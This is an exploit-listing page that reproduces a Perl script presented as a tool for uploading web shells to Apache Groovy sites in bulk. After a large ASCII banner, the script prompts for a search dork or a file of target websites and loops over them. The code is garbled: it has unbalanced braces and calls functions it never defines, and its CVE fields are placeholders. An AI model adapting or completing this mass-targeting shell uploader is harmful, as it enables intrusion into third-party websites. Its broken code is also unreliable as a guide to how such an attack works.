Advertisement






Apache Groovy Upload Shell With Perl

CVE Category Price Severity
CVE-XXXX-XXXX CWE-XX Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2018-02-09
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018020125

Below is a copy:

Apache Groovy Upload Shell With Perl
##############################################################################
#exploit author: Mr.Rm19
#09-02-2018
#Apache Groovy Upload Shell With Perl
#DORK: N/A
##################################################################################
# POC :
# #!/usr/bin/perl

#Copyright (c) 2018 - Mr.Rm19

use LWP::UserAgent;
use HTTP::Request::Common;
use Term::ANSIColor;
use HTTP::Request::Common qw(GET);
$ag = LWP::UserAgent->new();
$ag->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Mr.Rm19/20010801");
$ag->timeout(10);


$list= "list.txt";
if ($^O =~ /MSWin32/) {system("cls"); }else { system("clear"); }

my $datetime    = localtime;

system("title Mr.Rm19");
if ($^O =~ /MSWin32/) {system("cls"); }else { system("clear"); }
print color('bold green');





print q(
                     __          .gp.__/                            
                       .ssSSSSSs.__    d$P^^^"                             
                    .sSSSSSSS$$$$$$$p.dP                                   
                  .SSSSSS$$$$$SSSSSSSS$bs+._                               
                .SSSS$$$$$SSSSS$$$$$$$SS$$$$b__                       /"-. 
                SSS$$$SSSSS$$$$$$$$SSSS$$$SSSS$b                   _/"-. / 
               :S$$$SSSSS$$$$$$$SSSSS$$$SSSS$$SSb                 //   /"-.
               $$SSSSS$$$$$$SSSSS$$$$$$S$$$$S$$$Sb.               ;   /   /
               SSSSS$$$$$SSSSS$$$$$$$SS'P   SS$$S`^b._.'         /:  :   / 
               :S$$$$$SSSSS$$$$$$$SSSP      :$SS$b              / ;  +-./  
                $$$$SSSS$$$$$$$SSSSSP        S$SS$;            / /  / / ;  
               d$$SSS$$$$$SSSSSSSSS' ,=._    :S':S$           / /  / / /   
              :$SSS$$$$SSSSSSSSS^"  '  _ ";  ;   S$          / /  / / /    
              SSS$$$SSSP.-TSS^"     .="$;   /    S;         / /  / / /     
             :SS$$$SSS$$ (;            "    \    P         / /  / : :      
             :S$$$SS$$$$b :                  \ .'         / /  /  :  \     
              T$$SS$$$$$j`-,    .          ,  \         /"-(  /   ;_-.\    
               `TSS$$$$P   ;    `.         `.-'        /  /\\/   .'/_ ;;   
                 TS$$$P    :             _.-;         /  /\\(   / /-" ;;   
                  SSS'      \           :-t"         : .-\\/ "-/":   //    
                .SS$$        `.          `-;  Mr.Rm19    )Y   y   /  ;  J/     
               :S$$$;          "-.        (          '"; j_.-/-./.-" \_    
               $S$SS              "j.     :            :/  ':    `-..' \   
              d$$SS;     :        /  "-._.'             `.  ;       `-./;  
            _S$$$SP       \      :                        \: :"-.      \;  
          ,$$$SSSj       , `.    ;                         : ;   "-,   /   
          S$$SS'"^-...___       : "-.                      ;/      ;  t    
      __.-`SS'---. `T$$$$$$q._       "-.                  / `.    /   ;    
  .-""__ `.'      `. `T$$$$$$$$b.       `.               :    "--"   /     
 /.-""  \/          `. T$$$$$$$$$$p.     .`._            /"-.  _   .'      
::      /             \ T$$$$$SS$$$$$b._  `.T$p.        /    "" ;-'        
;;     :               \ T$$$S$$$$$$$$$$$p._L$$$$p.    /       ,           
;;     ;                \ $$$$$$$$$$$$$$$$$$$SS$$$$$. /                    
::     ;                 ;:$$$$$$$$$$$$$$SSSSSSSSS$$$y        '            
 ;;    :                  "^$$$$$$$$$$$$$$$$$SSSS$$$P        /             
 ;;     b.                   "^$$$$$$$$$$$$$$$$$S$$'        /              
 ::     :$$p.  -._              "^$$$$$$$$$$$$$$$'         /               
  ;;     $$$$$p.                   "^$$$$$$$$$$P          /                
  ::     :$$$$$$p.                    "^$$$$$$P          ,                 
   ;;     T$$$$$$$$p.                    "^$$P                             
   ::      T$$$$$$$P "-.                    "           '                  
   s;;      $$$$$$P   d$$p._                     /     /                   
  S$$:      $$$$$t   d$$$$$$$p._          "-.  .'     /                    
  SS$;;     :P^"\ \.d$$$$$$$$$$$$p._         ""      /                     
   TS::      \   d$$$$$$$$$$$$$$$$$$$p._            /                      
    SS.\     .jq$$$$$$$$$$$$$$$$$$^^^^^""-._      .';                      
   $$$$.tsssj' `T$$$$$$$^^^^^"""            "-._.'  ;                      
   $$$SSS         \                 /            \ :                       
   '^SSS_          \               :          :    :                       
     $$$SS.         \              ;          :    ;                       
     '$$$SS          \            :           ;   :                        
       "^S$.          \           ;          :    :                        
         S$$b.         \                     ;    ;                        
         S$$$$          ;                   :    :                         
         'TSS$$$s.      :                   ;    ;                         
             TS$$Ss_    ;                   ;   :                          
              `SSS$$$p./                   :    ;                          
                  TS$$'            ;       ;    :                          
                   "S              :       ;     ;                         
                   /                ;      :     :                         
                  /                 :            :                         
                 /"-.                          .' ;                        
                /    ""--..__          __..--""   :                        
                             """"""""""                                    


);

print color('reset');
print "                       ";
print colored ("[ Mr.Rm19  ]",'white on_red');  
print colored ("[ Coded By Mr.Rm19 ]\n",'white on_red');
print "                           ";
print colored ("[ Start At $datetime ]",'white on_red'),"\n\n";

print color('bold red'),"[";
print color('bold green'),"1";
print color('bold red'),"] ";
print color("bold white"),"upload shel?     |> yes\n";
print color('bold red'),"[";
print color('bold green'),"2";
print color('bold red'),"] ";
print color('bold red'),"] ";
print color("bold white"),"Choose Number : ";
my $targett = <STDIN>;
chomp $targett;

if($targett eq '1')
{
print color('bold red'),"[";
print color('bold green'),"+";
print color('bold red'),"] ";
print color("bold white"),"[Sites?  ]\n";
print color('bold red'),"[";
print color('bold green'),"+";
print color('bold red'),"] ";
print color("bold white"),"Give Me Dork:";
$dork=<STDIN>;
chomp($dork);
$dork=~s/ /+/g;
gassonee();
}

if($targett eq '2')
{
print color('bold red'),"[";
print color('bold green'),"+";
print color('bold red'),"] ";
{
{ { 
{

}


if($targett eq '3')
{
print color('bold red'),"[";
print color('bold green'),"+";
print color('bold red'),"] ";
print color('bold red'),"[";
print color('bold green'),"+";
print color('bold red'),"] ";
print color("bold white")," Path to your websites list:";
my $list=<STDIN>;
chomp($list);
        open (THETARGET, "<$list") || die "[-] gAGaL";
@TARGETS = <THETARGET>;
close THETARGET;
$link=$#TARGETS + 1;



OUTER: foreach $tofuck(@TARGETS){
chomp($tofuck);
if($tofuck =~ /http:\/\/(.*)\//) {
$tofuck= $1;
get();
}else{
get();
}

}

chomp($list); 
{
{
}
;

friend : c4ur un!onb4se 008 ./uzumak1 hacker sakit hati w4uw1k 190102 !0nt!5

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum